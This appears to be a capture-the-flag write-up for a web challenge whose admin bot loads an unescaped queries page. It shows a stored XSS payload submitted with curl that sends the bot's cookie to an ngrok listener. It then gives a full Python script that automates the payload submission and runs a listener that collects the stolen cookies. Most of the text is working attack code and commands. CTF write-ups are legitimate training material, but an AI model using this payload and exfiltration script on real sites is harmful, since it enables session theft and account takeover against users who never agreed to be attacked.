
Not much information is available on the website itself; it just shows an animation.


It had a downloadable file (the application source), so let's analyze it.


There are two endpoints. /api/submit is used to add a new query, and /queries shows all queries stored in the database, but it can only be accessed from localhost.

There is also a bot that visits the /queries page with a cookie we need to steal, because that is where the flag is.


Now let's take a look at the /queries page.


The queries page just renders every query from the database as-is, with no filtering or output escaping, so we can inject a stored XSS payload and steal the admin bot's cookie when it visits the page.

First, we need a listener. I start an HTTP server with Python and expose it with ngrok, since the bot runs on the target's public host and has to reach my listener, and I don't have a public IP.

#Terminal 1 (listener; the python access log will show the exfiltrated cookie in the request line)
python3 -m http.server 80

#Terminal 2 (expose port 80; use the https forwarding URL ngrok prints as Your-Ngrok-Address below)
ngrok http 80

#Terminal 3 (submit the payload; it is stored and executed when the bot loads /queries)
curl -X POST http://Target-IP:Target-Port/api/submit -H "Content-Type: application/json" --data-raw '{"query" : "<script>const cookie = document.cookie; const xhttp = new XMLHttpRequest(); xhttp.open(\"GET\", `Your-Ngrok-Address?cookie=${cookie}`, true); xhttp.send();</script>"}'
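The same attack in one script, as an added example that is not part of the original writeup: it builds the JSON body with json.dumps so the quotes inside the script need no manual escaping, submits it to /api/submit, and runs a small listener that parses the `cookie` parameter out of the callback instead of digging it out of http.server's access log. The target URL and listener URL are placeholders you supply on the command line; the request path in the test is constructed.

```python
import json
import sys
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional


def build_xss_payload(listener_url: str) -> dict:
    """Body for POST /api/submit. The script reads document.cookie and sends it
    to the listener as a query parameter. json.dumps(listener_url) yields a valid
    JS string literal, so no quotes have to be escaped by hand.
    Note: cookies flagged HttpOnly are invisible to document.cookie."""
    script = (
        "<script>"
        "fetch(" + json.dumps(listener_url) + " + '?cookie=' + "
        "encodeURIComponent(document.cookie));"
        "</script>"
    )
    return {"query": script}


def encode_payload(payload: dict) -> bytes:
    """Serialize the body; json.dumps escapes the inner double quotes for us."""
    return json.dumps(payload).encode()


def extract_cookie(request_path: str) -> Optional[str]:
    """Pull the exfiltrated cookie out of the path the listener receives,
    e.g. '/?cookie=session%3Dabc123'. Returns None when the parameter is absent."""
    query = urllib.parse.urlparse(request_path).query
    values = urllib.parse.parse_qs(query).get("cookie")
    return values[0] if values else None


class ExfilHandler(BaseHTTPRequestHandler):
    """Listener that prints only captured cookies (stray requests are ignored)."""

    def do_GET(self):
        cookie = extract_cookie(self.path)
        if cookie is not None:
            print(f"[+] cookie from {self.client_address[0]}: {cookie}", flush=True)
        self.send_response(204)
        self.end_headers()

    def log_message(self, *args):
        pass  # silence the default access log


def submit_payload(target_url: str, listener_url: str) -> int:
    """POST the stored-XSS payload to the target's /api/submit; returns HTTP status."""
    req = urllib.request.Request(
        target_url,
        data=encode_payload(build_xss_payload(listener_url)),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status


if __name__ == "__main__":
    # python3 exfil.py listen [port]            -> run the callback listener
    # python3 exfil.py submit TARGET LISTENER   -> store the payload on the target
    if len(sys.argv) >= 2 and sys.argv[1] == "listen":
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
        HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
    elif len(sys.argv) == 4 and sys.argv[1] == "submit":
        print("status:", submit_payload(sys.argv[2], sys.argv[3]))
    else:
        print(__doc__ or "usage: listen [port] | submit TARGET LISTENER")
```

Run `listen` on the machine ngrok forwards to, then `submit http://Target-IP:Target-Port/api/submit https://your-ngrok-address` and wait for the bot to load /queries; the payload uses fetch instead of XMLHttpRequest, which is equivalent for this purpose, and encodeURIComponent keeps cookies containing `;` or `=` intact in the query string.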
